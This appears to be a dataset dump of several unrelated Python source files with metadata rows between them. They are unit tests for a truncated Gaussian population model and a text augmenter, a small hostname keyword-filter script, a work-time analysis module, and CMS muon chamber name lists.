self.assertEqual(sens[4], ref_sens[4])
self.assertEqual(sens[5], ref_sens[5])
self.assertEqual(sens[6], ref_sens[6])
self.assertEqual(sens[7], ref_sens[7])
self.assertEqual(sens[8], ref_sens[8])
self.assertEqual(sens[9], ref_sens[9])
self.assertAlmostEqual(sens[10], ref_sens[10], 5)
self.assertAlmostEqual(sens[11], ref_sens[11], 5)
# Test case V: mu_log or sigma_log negative or zero
# Test case V.1
psis = [np.exp(10)] * n_ids
mu = 1
sigma = 0
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
# Test case V.2
psis = [np.exp(10)] * n_ids
mu = 1
sigma = -10
parameters = [mu] + [sigma]
score, sens = self.pop_model.compute_sensitivities(parameters, psis)
self.assertEqual(score, -np.inf)
self.assertEqual(sens[0], np.inf)
self.assertEqual(sens[1], np.inf)
self.assertEqual(sens[2], np.inf)
def test_get_mean_and_std(self):
# Test case I: sigma approx 0
# Then:
# mean approx mu
# std approx 0
# Test case I.1:
mu = 1
sigma = 0.00001
parameters = [mu, sigma]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertAlmostEqual(mean, mu)
self.assertAlmostEqual(std, sigma)
mu = 3
sigma = 0.00001
parameters = [mu, sigma]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertAlmostEqual(mean, mu)
self.assertAlmostEqual(std, sigma)
# Test case II: mu = 0
# Then:
# mean = sigma * phi(0) * 2
# std = sigma * sqrt(1 + (phi(0) * 2)**2)
# Test case II.1:
mu = 0
sigma = 1
# Compute references
mean_ref = sigma * norm.pdf(0) * 2
std_ref = sigma * np.sqrt(
1 - (norm.pdf(0) * 2)**2)
parameters = [mu, sigma]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(mean, mean_ref)
self.assertEqual(std, std_ref)
# Test case II.2:
mu = 0
sigma = 10
# Compute references
mean_ref = sigma * norm.pdf(0) * 2
std_ref = sigma * np.sqrt(
1 - (norm.pdf(0) * 2)**2)
parameters = [mu, sigma]
mean, std = self.pop_model.get_mean_and_std(parameters)
self.assertEqual(mean, mean_ref)
self.assertEqual(std, std_ref)
# Test case III: Negative mu and sigma
mu = -1
sigma = 1
parameters = [mu, sigma]
with self.assertRaisesRegex(ValueError, 'The parameters mu'):
self.pop_model.get_mean_and_std(parameters)
mu = 1
sigma = -1
parameters = [mu, sigma]
with self.assertRaisesRegex(ValueError, 'The parameters mu'):
self.pop_model.get_mean_and_std(parameters)
def test_get_parameter_names(self):
names = ['Mu', 'Sigma']
self.assertEqual(self.pop_model.get_parameter_names(), names)
def test_n_hierarchical_parameters(self):
n_ids = 10
n_hierarchical_params = self.pop_model.n_hierarchical_parameters(n_ids)
self.assertEqual(len(n_hierarchical_params), 2)
self.assertEqual(n_hierarchical_params[0], n_ids)
self.assertEqual(n_hierarchical_params[1], 2)
def test_n_parameters(self):
self.assertEqual(self.pop_model.n_parameters(), 2)
def test_sample(self):
# Test I: sample size 1
seed = np.random.default_rng(seed=42)
parameters = [3, 2]
sample = self.pop_model.sample(parameters, seed=seed)
n_samples = 1
self.assertEqual(sample.shape, (n_samples,))
# Test II: sample size > 1
seed = 1
parameters = [3, 2]
n_samples = 4
sample = self.pop_model.sample(
parameters, n_samples=n_samples, seed=seed)
self.assertEqual(
sample.shape, (n_samples,))
def test_sample_bad_input(self):
# Too many paramaters
parameters = [1, 1, 1, 1, 1]
with self.assertRaisesRegex(ValueError, 'The number of provided'):
self.pop_model.sample(parameters)
# Negative std
parameters = [1, -1]
with self.assertRaisesRegex(
ValueError, 'A truncated Gaussian distribution'):
self.pop_model.sample(parameters)
def test_set_parameter_names(self):
# Test some name
names = ['test', 'name']
self.pop_model.set_parameter_names(names)
self.assertEqual(
self.pop_model.get_parameter_names(), names)
# Set back to default name
self.pop_model.set_parameter_names(None)
names = self.pop_model.get_parameter_names()
self.assertEqual(len(names), 2)
self.assertEqual(names[0], 'Mu')
self.assertEqual(names[1], 'Sigma')
def test_set_parameter_names_bad_input(self):
# Wrong number of names
names = ['only', 'two', 'is', 'allowed']
with self.assertRaisesRegex(ValueError, 'Length of names'):
self.pop_model.set_parameter_names(names)
if __name__ == '__main__':
unittest.main()
| 35.393149 | 79 | 0.6017 | 14,554 | 112,621 | 4.479937 | 0.021712 | 0.127452 | 0.046564 | 0.036426 | 0.941458 | 0.916596 | 0.89425 | 0.873023 | 0.843346 | 0.828223 | 0 | 0.032108 | 0.280143 | 112,621 | 3,181 | 80 | 35.404275 | 0.772138 | 0.106055 | 0 | 0.87156 | 0 | 0 | 0.016198 | 0.000639 | 0 | 0 | 0 | 0 | 0.404587 | 1 | 0.047248 | false | 0 | 0.001835 | 0 | 0.052752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e6140b523a7f0a747b1258cac45fb7fb6f274b21 | 1,350 | py | Python | data-mining/test.py | Lycine/network-traffic-analysis-platform-python | 690135c64666c339da2eb9553462dc2c89932f40 | [
"MIT"
] | null | null | null | data-mining/test.py | Lycine/network-traffic-analysis-platform-python | 690135c64666c339da2eb9553462dc2c89932f40 | [
"MIT"
] | null | null | null | data-mining/test.py | Lycine/network-traffic-analysis-platform-python | 690135c64666c339da2eb9553462dc2c89932f40 | [
"MIT"
] | null | null | null | # hostnames = ['abc123', 'def456', 'ghi789','ab123','1'] # normallist
# black_hostname_keyword = ['abc', '456','ab1'] # black
#
# for i, a_hostname in enumerate(hostnames):
# print 'hostname: ' + a_hostname,
# print ', ' + str(i)
# for j, black_keyword in enumerate(black_hostname_keyword):
# print '\tblack_keyword: ' + black_keyword,
# print ', ' + str(j)
# if black_keyword not in a_hostname:
#
# print '\t\tdid not block: ' + a_hostname,
# print j, len(black_hostname_keyword)
# if j == len(black_hostname_keyword) - 1:
# print 'write'
# # break
# else:
# print '\t\tblock: ' + a_hostname
# break
# hostnames = ['abc123', 'def456', 'ghi789','ab123','1'] # normallist
black_hostname_keyword = ['abc', '456','ab1'] # black
a_hostname = 'ac123'
print 'hostname: ' + a_hostname,
for j, black_keyword in enumerate(black_hostname_keyword):
print '\tblack_keyword: ' + black_keyword,
print ', ' + str(j)
if black_keyword not in a_hostname:
print '\t\tdid not block: ' + a_hostname,
print j, len(black_hostname_keyword)
if j == len(black_hostname_keyword) - 1:
print 'write'
# break
else:
print '\t\tblock: ' + a_hostname
break
| 32.142857 | 70 | 0.571852 | 157 | 1,350 | 4.700637 | 0.210191 | 0.121951 | 0.216802 | 0.092141 | 0.864499 | 0.864499 | 0.864499 | 0.864499 | 0.864499 | 0.864499 | 0 | 0.040583 | 0.288148 | 1,350 | 41 | 71 | 32.926829 | 0.727367 | 0.575556 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.5 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
e64d554bfa111358419dc36e84bb2f5f81c7b4a1 | 3,231 | py | Python | test/augmenter/char/test_random_char.py | booltime/nlpaug | d21e51bacd170dcd3dddfc34a401f0215f91dbf1 | [
"MIT"
] | 1 | 2021-09-08T09:18:02.000Z | 2021-09-08T09:18:02.000Z | test/augmenter/char/test_random_char.py | booltime/nlpaug | d21e51bacd170dcd3dddfc34a401f0215f91dbf1 | [
"MIT"
] | null | null | null | test/augmenter/char/test_random_char.py | booltime/nlpaug | d21e51bacd170dcd3dddfc34a401f0215f91dbf1 | [
"MIT"
] | null | null | null | import unittest
from nlpaug.augmenter.char.random import RandomCharAug
from nlpaug.util import Action
class TestRandomCharReplaceAug(unittest.TestCase):
def test_insert_single_word(self):
texts = ['Zoology', 'roku123456']
aug = RandomCharAug(action=Action.INSERT)
for text in texts:
augmented_text = aug.augment(text)
self.assertNotEqual(text, augmented_text)
self.assertLess(len(text), len(augmented_text))
self.assertTrue(len(texts) > 0)
def test_insert_multi_words(self):
texts = ['The quick brown fox jumps over the lazy dog']
aug = RandomCharAug(action=Action.INSERT)
for text in texts:
augmented_cnt = 0
augmented_text = aug.augment(text)
tokens = aug.tokenizer(text)
augmented_tokens = aug.tokenizer(augmented_text)
for token, augmented_token in zip(tokens, augmented_tokens):
if token != augmented_token:
augmented_cnt += 1
self.assertLess(augmented_cnt, len(tokens))
self.assertNotEqual(text, augmented_text)
self.assertLess(len(text), len(augmented_text))
self.assertTrue(len(texts) > 0)
def test_substitute_single_word(self):
texts = ['Zoology', 'roku123456']
aug = RandomCharAug(action=Action.SUBSTITUTE)
for text in texts:
augmented_text = aug.augment(text)
self.assertNotEqual(text, augmented_text)
self.assertTrue(len(texts) > 0)
def test_substitute_multi_words(self):
texts = ['The quick brown fox jumps over the lazy dog']
aug = RandomCharAug(action=Action.SUBSTITUTE)
for text in texts:
augmented_cnt = 0
augmented_text = aug.augment(text)
tokens = aug.tokenizer(text)
augmented_tokens = aug.tokenizer(augmented_text)
for token, augmented_token in zip(tokens, augmented_tokens):
if token != augmented_token:
augmented_cnt += 1
self.assertLess(augmented_cnt, len(tokens))
self.assertNotEqual(text, augmented_text)
self.assertTrue(len(texts) > 0)
def test_swap(self):
texts = ['The quick brown fox jumps over the lazy dog']
aug = RandomCharAug(action=Action.SWAP)
for text in texts:
augmented_cnt = 0
augmented_text = aug.augment(text)
tokens = aug.tokenizer(text)
augmented_tokens = aug.tokenizer(augmented_text)
for token, augmented_token in zip(tokens, augmented_tokens):
if token != augmented_token:
augmented_cnt += 1
self.assertLess(augmented_cnt, len(tokens))
self.assertNotEqual(text, augmented_text)
self.assertTrue(len(texts) > 0)
def test_delete(self):
tokens = ['Zoology', 'roku123456']
aug = RandomCharAug(action=Action.DELETE)
for t in tokens:
augmented_text = aug.augment(t)
self.assertNotEqual(t, augmented_text)
self.assertLess(len(augmented_text), len(t))
self.assertTrue(len(tokens) > 0)
| 34.010526 | 72 | 0.619622 | 359 | 3,231 | 5.428969 | 0.150418 | 0.120062 | 0.069779 | 0.086198 | 0.857363 | 0.84197 | 0.818881 | 0.818881 | 0.818881 | 0.818881 | 0 | 0.013123 | 0.292479 | 3,231 | 94 | 73 | 34.37234 | 0.839458 | 0 | 0 | 0.742857 | 0 | 0 | 0.055728 | 0 | 0 | 0 | 0 | 0 | 0.257143 | 1 | 0.085714 | false | 0 | 0.042857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
050691db89eaff2c5dc6e32a22810e75b94758ff | 4,066 | py | Python | emission/analysis/modelling/work_time.py | Andrew-Tan/e-mission-server | 91d59bee86e63d803e401f10f4b6a2502effedda | [
"BSD-3-Clause"
] | null | null | null | emission/analysis/modelling/work_time.py | Andrew-Tan/e-mission-server | 91d59bee86e63d803e401f10f4b6a2502effedda | [
"BSD-3-Clause"
] | 1 | 2017-08-31T19:54:16.000Z | 2017-08-31T19:54:16.000Z | emission/analysis/modelling/work_time.py | Andrew-Tan/e-mission-server | 91d59bee86e63d803e401f10f4b6a2502effedda | [
"BSD-3-Clause"
] | null | null | null | __author__ = 'Yin'
# Standard imports
# Our imports
import emission.core.get_database as edb
import work_place as wp
import emission.core.common as ec
time_list = [[0,2],[2,4],[4,6],[6,8], [8,10], [10,12], [12,14], [14,16], [16,18], [18,20],[20,22],[22,24]]
def get_work_start_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'to'}]}):
if work!='N/A' and ec.Is_place(section['section_end_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_work_end_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'from'}]}):
if work!='N/A' and ec.Is_place(section['section_start_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_user_work_start_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_user_work_end_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
def get_Alluser_work_start_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_Alluser_work_end_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
############################################## pie chart below ###############################################
def get_user_work_start_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'arr_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_user_work_end_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'dep_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_Alluser_work_start_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({'arr_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}).count()
return timeCountMap
def get_Alluser_work_end_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({'dep_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}).count()
return timeCountMap
| 37.648148 | 130 | 0.615347 | 579 | 4,066 | 4.060449 | 0.162349 | 0.051042 | 0.076563 | 0.040834 | 0.918333 | 0.910251 | 0.887282 | 0.887282 | 0.880476 | 0.880476 | 0 | 0.029865 | 0.201181 | 4,066 | 107 | 131 | 38 | 0.693966 | 0.045745 | 0 | 0.708861 | 0 | 0 | 0.078063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126582 | false | 0 | 0.037975 | 0 | 0.291139 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
75c8a110385f3cee23ad06aa19f317b1eed0cc21 | 13,092 | py | Python | Alignment/MuonAlignmentAlgorithms/python/Reference_intrackfit_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Alignment/MuonAlignmentAlgorithms/python/Reference_intrackfit_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Alignment/MuonAlignmentAlgorithms/python/Reference_intrackfit_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | MB_wheelm2_station1 = ["MB -2 1 1", "MB -2 1 2", "MB -2 1 3", "MB -2 1 4", "MB -2 1 5", "MB -2 1 6", "MB -2 1 7", "MB -2 1 8", "MB -2 1 9", "MB -2 1 10", "MB -2 1 11", "MB -2 1 12"]
MB_wheelm2_station2 = ["MB -2 2 1", "MB -2 2 2", "MB -2 2 3", "MB -2 2 4", "MB -2 2 5", "MB -2 2 6", "MB -2 2 7", "MB -2 2 8", "MB -2 2 9", "MB -2 2 10", "MB -2 2 11", "MB -2 2 12"]
MB_wheelm2_station3 = ["MB -2 3 1", "MB -2 3 2", "MB -2 3 3", "MB -2 3 4", "MB -2 3 5", "MB -2 3 6", "MB -2 3 7", "MB -2 3 8", "MB -2 3 9", "MB -2 3 10", "MB -2 3 11", "MB -2 3 12"]
MB_wheelm2_station4 = ["MB -2 4 1", "MB -2 4 2", "MB -2 4 3", "MB -2 4 4", "MB -2 4 5", "MB -2 4 6", "MB -2 4 7", "MB -2 4 8", "MB -2 4 9", "MB -2 4 10", "MB -2 4 11", "MB -2 4 12", "MB -2 4 13", "MB -2 4 14"]
MB_wheelm1_station1 = ["MB -1 1 1", "MB -1 1 2", "MB -1 1 3", "MB -1 1 4", "MB -1 1 5", "MB -1 1 6", "MB -1 1 7", "MB -1 1 8", "MB -1 1 9", "MB -1 1 10", "MB -1 1 11", "MB -1 1 12"]
MB_wheelm1_station2 = ["MB -1 2 1", "MB -1 2 2", "MB -1 2 3", "MB -1 2 4", "MB -1 2 5", "MB -1 2 6", "MB -1 2 7", "MB -1 2 8", "MB -1 2 9", "MB -1 2 10", "MB -1 2 11", "MB -1 2 12"]
MB_wheelm1_station3 = ["MB -1 3 1", "MB -1 3 2", "MB -1 3 3", "MB -1 3 4", "MB -1 3 5", "MB -1 3 6", "MB -1 3 7", "MB -1 3 8", "MB -1 3 9", "MB -1 3 10", "MB -1 3 11", "MB -1 3 12"]
MB_wheelm1_station4 = ["MB -1 4 1", "MB -1 4 2", "MB -1 4 3", "MB -1 4 4", "MB -1 4 5", "MB -1 4 6", "MB -1 4 7", "MB -1 4 8", "MB -1 4 9", "MB -1 4 10", "MB -1 4 11", "MB -1 4 12", "MB -1 4 13", "MB -1 4 14"]
MB_wheel0_station1 = ["MB 0 1 1", "MB 0 1 2", "MB 0 1 3", "MB 0 1 4", "MB 0 1 5", "MB 0 1 6", "MB 0 1 7", "MB 0 1 8", "MB 0 1 9", "MB 0 1 10", "MB 0 1 11", "MB 0 1 12"]
MB_wheel0_station2 = ["MB 0 2 1", "MB 0 2 2", "MB 0 2 3", "MB 0 2 4", "MB 0 2 5", "MB 0 2 6", "MB 0 2 7", "MB 0 2 8", "MB 0 2 9", "MB 0 2 10", "MB 0 2 11", "MB 0 2 12"]
MB_wheel0_station3 = ["MB 0 3 1", "MB 0 3 2", "MB 0 3 3", "MB 0 3 4", "MB 0 3 5", "MB 0 3 6", "MB 0 3 7", "MB 0 3 8", "MB 0 3 9", "MB 0 3 10", "MB 0 3 11", "MB 0 3 12"]
MB_wheel0_station4 = ["MB 0 4 1", "MB 0 4 2", "MB 0 4 3", "MB 0 4 4", "MB 0 4 5", "MB 0 4 6", "MB 0 4 7", "MB 0 4 8", "MB 0 4 9", "MB 0 4 10", "MB 0 4 11", "MB 0 4 12", "MB 0 4 13", "MB 0 4 14"]
MB_wheelp1_station1 = ["MB +1 1 1", "MB +1 1 2", "MB +1 1 3", "MB +1 1 4", "MB +1 1 5", "MB +1 1 6", "MB +1 1 7", "MB +1 1 8", "MB +1 1 9", "MB +1 1 10", "MB +1 1 11", "MB +1 1 12"]
MB_wheelp1_station2 = ["MB +1 2 1", "MB +1 2 2", "MB +1 2 3", "MB +1 2 4", "MB +1 2 5", "MB +1 2 6", "MB +1 2 7", "MB +1 2 8", "MB +1 2 9", "MB +1 2 10", "MB +1 2 11", "MB +1 2 12"]
MB_wheelp1_station3 = ["MB +1 3 1", "MB +1 3 2", "MB +1 3 3", "MB +1 3 4", "MB +1 3 5", "MB +1 3 6", "MB +1 3 7", "MB +1 3 8", "MB +1 3 9", "MB +1 3 10", "MB +1 3 11", "MB +1 3 12"]
MB_wheelp1_station4 = ["MB +1 4 1", "MB +1 4 2", "MB +1 4 3", "MB +1 4 4", "MB +1 4 5", "MB +1 4 6", "MB +1 4 7", "MB +1 4 8", "MB +1 4 9", "MB +1 4 10", "MB +1 4 11", "MB +1 4 12", "MB +1 4 13", "MB +1 4 14"]
MB_wheelp2_station1 = ["MB +2 1 1", "MB +2 1 2", "MB +2 1 3", "MB +2 1 4", "MB +2 1 5", "MB +2 1 6", "MB +2 1 7", "MB +2 1 8", "MB +2 1 9", "MB +2 1 10", "MB +2 1 11", "MB +2 1 12"]
MB_wheelp2_station2 = ["MB +2 2 1", "MB +2 2 2", "MB +2 2 3", "MB +2 2 4", "MB +2 2 5", "MB +2 2 6", "MB +2 2 7", "MB +2 2 8", "MB +2 2 9", "MB +2 2 10", "MB +2 2 11", "MB +2 2 12"]
MB_wheelp2_station3 = ["MB +2 3 1", "MB +2 3 2", "MB +2 3 3", "MB +2 3 4", "MB +2 3 5", "MB +2 3 6", "MB +2 3 7", "MB +2 3 8", "MB +2 3 9", "MB +2 3 10", "MB +2 3 11", "MB +2 3 12"]
MB_wheelp2_station4 = ["MB +2 4 1", "MB +2 4 2", "MB +2 4 3", "MB +2 4 4", "MB +2 4 5", "MB +2 4 6", "MB +2 4 7", "MB +2 4 8", "MB +2 4 9", "MB +2 4 10", "MB +2 4 11", "MB +2 4 12", "MB +2 4 13", "MB +2 4 14"]
MB_wheelm2 = MB_wheelm2_station1 + MB_wheelm2_station2 + MB_wheelm2_station3 + MB_wheelm2_station4
MB_wheelm1 = MB_wheelm1_station1 + MB_wheelm1_station2 + MB_wheelm1_station3 + MB_wheelm1_station4
MB_wheel0 = MB_wheel0_station1 + MB_wheel0_station2 + MB_wheel0_station3 + MB_wheel0_station4
MB_wheelp1 = MB_wheelp1_station1 + MB_wheelp1_station2 + MB_wheelp1_station3 + MB_wheelp1_station4
MB_wheelp2 = MB_wheelp2_station1 + MB_wheelp2_station2 + MB_wheelp2_station3 + MB_wheelp2_station4
MB_station1 = MB_wheelm2_station1 + MB_wheelm1_station1 + MB_wheel0_station1 + MB_wheelp1_station1 + MB_wheelp2_station1
MB_station2 = MB_wheelm2_station2 + MB_wheelm1_station2 + MB_wheel0_station2 + MB_wheelp1_station2 + MB_wheelp2_station2
MB_station3 = MB_wheelm2_station3 + MB_wheelm1_station3 + MB_wheel0_station3 + MB_wheelp1_station3 + MB_wheelp2_station3
MB_station4 = MB_wheelm2_station4 + MB_wheelm1_station4 + MB_wheel0_station4 + MB_wheelp1_station4 + MB_wheelp2_station4
barrel = MB_station1 + MB_station2 + MB_station3 + MB_station4
MEm41 = ["ME-4/1 1", "ME-4/1 2", "ME-4/1 3", "ME-4/1 4", "ME-4/1 5", "ME-4/1 6", "ME-4/1 7", "ME-4/1 8", "ME-4/1 9", "ME-4/1 10", "ME-4/1 11", "ME-4/1 12", "ME-4/1 13", "ME-4/1 14", "ME-4/1 15", "ME-4/1 16", "ME-4/1 17", "ME-4/1 18"]
MEm42 = ["ME-4/2 1", "ME-4/2 2", "ME-4/2 3", "ME-4/2 4", "ME-4/2 5", "ME-4/2 6", "ME-4/2 7", "ME-4/2 8", "ME-4/2 9", "ME-4/2 10", "ME-4/2 11", "ME-4/2 12", "ME-4/2 13", "ME-4/2 14", "ME-4/2 15", "ME-4/2 16", "ME-4/2 17", "ME-4/2 18", "ME-4/2 19", "ME-4/2 20", "ME-4/2 21", "ME-4/2 22", "ME-4/2 23", "ME-4/2 24", "ME-4/2 25", "ME-4/2 26", "ME-4/2 27", "ME-4/2 28", "ME-4/2 29", "ME-4/2 30", "ME-4/2 31", "ME-4/2 32", "ME-4/2 33", "ME-4/2 34", "ME-4/2 35", "ME-4/2 36"]
MEm31 = ["ME-3/1 1", "ME-3/1 2", "ME-3/1 3", "ME-3/1 4", "ME-3/1 5", "ME-3/1 6", "ME-3/1 7", "ME-3/1 8", "ME-3/1 9", "ME-3/1 10", "ME-3/1 11", "ME-3/1 12", "ME-3/1 13", "ME-3/1 14", "ME-3/1 15", "ME-3/1 16", "ME-3/1 17", "ME-3/1 18"]
MEm32 = ["ME-3/2 1", "ME-3/2 2", "ME-3/2 3", "ME-3/2 4", "ME-3/2 5", "ME-3/2 6", "ME-3/2 7", "ME-3/2 8", "ME-3/2 9", "ME-3/2 10", "ME-3/2 11", "ME-3/2 12", "ME-3/2 13", "ME-3/2 14", "ME-3/2 15", "ME-3/2 16", "ME-3/2 17", "ME-3/2 18", "ME-3/2 19", "ME-3/2 20", "ME-3/2 21", "ME-3/2 22", "ME-3/2 23", "ME-3/2 24", "ME-3/2 25", "ME-3/2 26", "ME-3/2 27", "ME-3/2 28", "ME-3/2 29", "ME-3/2 30", "ME-3/2 31", "ME-3/2 32", "ME-3/2 33", "ME-3/2 34", "ME-3/2 35", "ME-3/2 36"]
MEm21 = ["ME-2/1 1", "ME-2/1 2", "ME-2/1 3", "ME-2/1 4", "ME-2/1 5", "ME-2/1 6", "ME-2/1 7", "ME-2/1 8", "ME-2/1 9", "ME-2/1 10", "ME-2/1 11", "ME-2/1 12", "ME-2/1 13", "ME-2/1 14", "ME-2/1 15", "ME-2/1 16", "ME-2/1 17", "ME-2/1 18"]
MEm22 = ["ME-2/2 1", "ME-2/2 2", "ME-2/2 3", "ME-2/2 4", "ME-2/2 5", "ME-2/2 6", "ME-2/2 7", "ME-2/2 8", "ME-2/2 9", "ME-2/2 10", "ME-2/2 11", "ME-2/2 12", "ME-2/2 13", "ME-2/2 14", "ME-2/2 15", "ME-2/2 16", "ME-2/2 17", "ME-2/2 18", "ME-2/2 19", "ME-2/2 20", "ME-2/2 21", "ME-2/2 22", "ME-2/2 23", "ME-2/2 24", "ME-2/2 25", "ME-2/2 26", "ME-2/2 27", "ME-2/2 28", "ME-2/2 29", "ME-2/2 30", "ME-2/2 31", "ME-2/2 32", "ME-2/2 33", "ME-2/2 34", "ME-2/2 35", "ME-2/2 36"]
MEm11 = ["ME-1/1 1", "ME-1/1 2", "ME-1/1 3", "ME-1/1 4", "ME-1/1 5", "ME-1/1 6", "ME-1/1 7", "ME-1/1 8", "ME-1/1 9", "ME-1/1 10", "ME-1/1 11", "ME-1/1 12", "ME-1/1 13", "ME-1/1 14", "ME-1/1 15", "ME-1/1 16", "ME-1/1 17", "ME-1/1 18", "ME-1/1 19", "ME-1/1 20", "ME-1/1 21", "ME-1/1 22", "ME-1/1 23", "ME-1/1 24", "ME-1/1 25", "ME-1/1 26", "ME-1/1 27", "ME-1/1 28", "ME-1/1 29", "ME-1/1 30", "ME-1/1 31", "ME-1/1 32", "ME-1/1 33", "ME-1/1 34", "ME-1/1 35", "ME-1/1 36"]
MEm12 = ["ME-1/2 1", "ME-1/2 2", "ME-1/2 3", "ME-1/2 4", "ME-1/2 5", "ME-1/2 6", "ME-1/2 7", "ME-1/2 8", "ME-1/2 9", "ME-1/2 10", "ME-1/2 11", "ME-1/2 12", "ME-1/2 13", "ME-1/2 14", "ME-1/2 15", "ME-1/2 16", "ME-1/2 17", "ME-1/2 18", "ME-1/2 19", "ME-1/2 20", "ME-1/2 21", "ME-1/2 22", "ME-1/2 23", "ME-1/2 24", "ME-1/2 25", "ME-1/2 26", "ME-1/2 27", "ME-1/2 28", "ME-1/2 29", "ME-1/2 30", "ME-1/2 31", "ME-1/2 32", "ME-1/2 33", "ME-1/2 34", "ME-1/2 35", "ME-1/2 36"]
MEm13 = ["ME-1/3 1", "ME-1/3 2", "ME-1/3 3", "ME-1/3 4", "ME-1/3 5", "ME-1/3 6", "ME-1/3 7", "ME-1/3 8", "ME-1/3 9", "ME-1/3 10", "ME-1/3 11", "ME-1/3 12", "ME-1/3 13", "ME-1/3 14", "ME-1/3 15", "ME-1/3 16", "ME-1/3 17", "ME-1/3 18", "ME-1/3 19", "ME-1/3 20", "ME-1/3 21", "ME-1/3 22", "ME-1/3 23", "ME-1/3 24", "ME-1/3 25", "ME-1/3 26", "ME-1/3 27", "ME-1/3 28", "ME-1/3 29", "ME-1/3 30", "ME-1/3 31", "ME-1/3 32", "ME-1/3 33", "ME-1/3 34", "ME-1/3 35", "ME-1/3 36"]
